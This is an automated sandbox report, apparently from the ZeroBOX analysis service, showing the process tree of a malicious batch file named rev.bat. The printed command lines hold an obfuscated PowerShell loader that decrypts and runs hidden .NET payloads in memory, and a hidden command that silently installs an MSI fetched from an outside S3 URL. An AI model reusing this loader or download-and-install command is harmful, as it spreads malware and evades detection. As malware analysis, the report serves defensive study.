popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "vjZHYuYwki" C:\Users\test22\AppData\Local\Temp\rev.bat

    2556

    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\rev.bat

      2628

      • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\rev.bat

        2740

        • rev.bat.exe "C:\Users\test22\AppData\Local\Temp\rev.bat.exe" -w hidden -c $Rwyy='ReYnHaaYnHadLiYnHanesYnHa'.Replace('YnHa', '');$PmMk='TraYnHansYnHafoYnHarmYnHaFinaYnHalYnHaBlYnHaockYnHa'.Replace('YnHa', '');$MfYp='FirYnHastYnHa'.Replace('YnHa', '');$kVgj='FroYnHamYnHaBYnHaasYnHae6YnHa4StYnHariYnHangYnHa'.Replace('YnHa', '');$aHWr='ChYnHaanYnHageExYnHatenYnHasiYnHaonYnHa'.Replace('YnHa', '');$gqav='GYnHaetCYnHaurrYnHaenYnHatPrYnHaocesYnHasYnHa'.Replace('YnHa', '');$DHcv='SplYnHaitYnHa'.Replace('YnHa', '');$EEdg='EnYnHatYnHarYnHayYnHaPoYnHaintYnHa'.Replace('YnHa', '');$tcdy='MaYnHaiYnHanYnHaMoYnHaduleYnHa'.Replace('YnHa', '');$aFEC='IYnHanvYnHaokeYnHa'.Replace('YnHa', '');$XlVq='LoadYnHa'.Replace('YnHa', '');$jaIs='CYnHareaYnHateYnHaDecrYnHayYnHapYnHatorYnHa'.Replace('YnHa', '');function tWkWm($tIqHx){$gvkKA=[System.Security.Cryptography.Aes]::Create();$gvkKA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$gvkKA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$gvkKA.Key=[System.Convert]::$kVgj('M9sMpwxY1XjodXbV6oJ2kek50ehlInCYuwfh/CjlMzc=');$gvkKA.IV=[System.Convert]::$kVgj('EClXKP7rmyoRnUX3gynDag==');$BjrdS=$gvkKA.$jaIs();$MTfir=$BjrdS.$PmMk($tIqHx,0,$tIqHx.Length);$BjrdS.Dispose();$gvkKA.Dispose();$MTfir;}function voAuL($tIqHx){$WKDaM=New-Object System.IO.MemoryStream(,$tIqHx);$vEUKC=New-Object System.IO.MemoryStream;$TsvRU=New-Object System.IO.Compression.GZipStream($WKDaM,[IO.Compression.CompressionMode]::Decompress);$TsvRU.CopyTo($vEUKC);$TsvRU.Dispose();$WKDaM.Dispose();$vEUKC.Dispose();$vEUKC.ToArray();}$UYevX=[System.Linq.Enumerable]::$MfYp([System.IO.File]::$Rwyy([System.IO.Path]::$aHWr([System.Diagnostics.Process]::$gqav().$tcdy.FileName, $null)));$UFUei=$UYevX.Substring(3).$DHcv(':');$qRpdv=voAuL (tWkWm ([Convert]::$kVgj($UFUei[0])));$mLDah=voAuL (tWkWm ([Convert]::$kVgj($UFUei[1])));[System.Reflection.Assembly]::$XlVq([byte[]]$mLDah).$EEdg.$aFEC($null,$null);[System.Reflection.Assembly]::$XlVq([byte[]]$qRpdv).$EEdg.$aFEC($null,$null);

          2836

        • powershell.exe powershell -WindowStyle Hidden -Command "Start-Sleep -Seconds 20"

          2920

        • powershell.exe powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'msiexec.exe' -ArgumentList '/i', 'https://fesad.s3.eu-north-1.amazonaws.com/Apppdfread.msi', '/qn' -Wait -WindowStyle Hidden"

          2056

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf